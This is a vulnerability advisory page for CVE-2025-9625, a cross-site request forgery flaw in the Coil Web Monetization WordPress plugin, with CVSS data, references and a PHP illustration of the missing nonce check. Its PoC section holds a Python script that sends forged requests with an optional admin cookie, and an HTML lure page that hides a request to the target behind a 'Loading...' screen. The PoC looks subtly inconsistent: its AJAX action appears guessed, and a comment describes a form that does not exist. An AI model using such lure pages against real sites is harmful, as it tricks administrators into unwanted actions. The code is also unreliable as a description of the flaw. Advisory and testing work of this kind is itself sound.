Security Vulnerability Report

CVE-2025-9625

Published: 2025-11-18 09:15:54
Last Modified: 2026-04-15 00:35:42

Description

The Coil Web Monetization plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.0.2. This is due to missing or incorrect nonce validation on the coil-get-css-selector parameter handling in the maybe_restrict_content function. This makes it possible for unauthenticated attackers to trigger the CSS selector detection functionality via a forged request, provided they can trick a site administrator into performing an action such as clicking on a link.
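The missing check the description refers to, as an added illustration in PHP that is not the plugin's own code: a hypothetical handler for the coil-get-css-selector parameter in its CSRF-prone form next to one using the capability and nonce checks WordPress provides. The coil_example_* names and the nonce action string are assumptions.

```php
<?php
// Added illustration, not the Coil plugin's own code. The coil_example_*
// names and the nonce action string are assumptions for this example.

const COIL_EXAMPLE_NONCE_ACTION = 'coil_example_css_selector';

// CSRF-prone pattern: the parameter's presence alone triggers the work, so a
// forged link opened by a logged-in administrator is honoured (CWE-352).
function coil_example_handle_selector_weak() {
    if ( empty( $_GET['coil-get-css-selector'] ) ) {
        return false;
    }
    $selector = sanitize_text_field( wp_unslash( $_GET['coil-get-css-selector'] ) );
    coil_example_run_detection( $selector );
    return true;
}

// Hardened pattern: require the capability, then a nonce bound to this action.
// wp_verify_nonce() is false for a missing, expired or mismatched nonce, and the
// nonce depends on the user's session, so a third-party page cannot mint one.
function coil_example_handle_selector_safe() {
    if ( empty( $_GET['coil-get-css-selector'] ) || ! current_user_can( 'manage_options' ) ) {
        return false;
    }
    $nonce = isset( $_GET['_wpnonce'] ) ? sanitize_text_field( wp_unslash( $_GET['_wpnonce'] ) ) : '';
    if ( ! wp_verify_nonce( $nonce, COIL_EXAMPLE_NONCE_ACTION ) ) {
        return false;
    }
    $selector = sanitize_text_field( wp_unslash( $_GET['coil-get-css-selector'] ) );
    coil_example_run_detection( $selector );
    return true;
}

// Legitimate links are minted server-side for the logged-in admin; wp_nonce_url()
// appends the _wpnonce value that the safe handler verifies.
function coil_example_detection_link( $selector ) {
    $url = add_query_arg( 'coil-get-css-selector', rawurlencode( $selector ), admin_url( 'admin.php' ) );
    return wp_nonce_url( $url, COIL_EXAMPLE_NONCE_ACTION );
}

// Stand-in for the plugin's detection work (assumed).
function coil_example_run_detection( $selector ) {
    do_action( 'coil_example_css_selector_detected', $selector );
}
```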

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

Coil Web Monetization plugin for WordPress, all versions up to and including 2.0.2 (no CPE configuration data is published for this record).

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import argparse


def exploit_csrf(target_url, admin_cookie=None):
    """
    CVE-2025-9625 CSRF PoC
    Coil Web Monetization Plugin < 2.0.3
    Missing nonce validation in maybe_restrict_content function
    """
    # Target endpoint that handles coil-get-css-selector parameter
    endpoint = target_url.rstrip('/') + '/wp-admin/admin-ajax.php'

    # Construct CSRF payload
    # The vulnerable parameter is 'coil-get-css-selector'
    data = {
        'action': 'coil_get_css_selector',          # AJAX action hook
        'coil-get-css-selector': 'test_selector',   # Vulnerable parameter
        'post_id': '1'                              # Target post ID
    }

    headers = {}
    if admin_cookie:
        headers['Cookie'] = admin_cookie

    try:
        print(f'[*] Sending CSRF request to {endpoint}')
        response = requests.post(endpoint, data=data, headers=headers, timeout=10)
        if response.status_code == 200:
            print('[+] Request sent successfully')
            print(f'[+] Response status: {response.status_code}')
            print(f'[+] Response: {response.text[:200]}')
        else:
            print(f'[-] Request failed with status: {response.status_code}')
    except requests.exceptions.RequestException as e:
        print(f'[-] Error: {e}')


# HTML PoC page for social engineering
html_poc = '''
<!DOCTYPE html>
<html>
<head>
    <title>Loading...</title>
</head>
<body>
    <h1>Please wait while loading...</h1>
    <img src="http://target-site.com/wp-admin/admin-ajax.php?action=coil_get_css_selector&coil-get-css-selector=test" style="display:none" onerror="window.close()">
    <script>
        // Automatically submit form on page load
        window.onload = function() {
            setTimeout(function() {
                window.close();
            }, 1000);
        };
    </script>
</body>
</html>
'''


if __name__ == '__main__':
    parser = argparse.ArgumentParser(description='CVE-2025-9625 CSRF PoC')
    parser.add_argument('-u', '--url', required=True, help='Target WordPress URL')
    parser.add_argument('-c', '--cookie', help='Admin session cookie (optional)')
    args = parser.parse_args()
    exploit_csrf(args.url, args.cookie)
```

Additional Record Data

Weakness: CWE-352 (Cross-Site Request Forgery)
NVD record status: Deferred
CVSS v3.1 subscores: exploitability 2.8, impact 1.4

References

https://plugins.trac.wordpress.org/browser/coil-web-monetization/tags/2.0.2/includes/functions.php#L48
https://plugins.trac.wordpress.org/browser/coil-web-monetization/tags/2.0.2/includes/gating/functions.php#L195
https://plugins.trac.wordpress.org/browser/coil-web-monetization/tags/2.0.2/includes/gating/functions.php#L202
https://www.wordfence.com/threat-intel/vulnerabilities/id/4aa4cb93-7af3-4427-a17f-160b27fcebb8?source=cve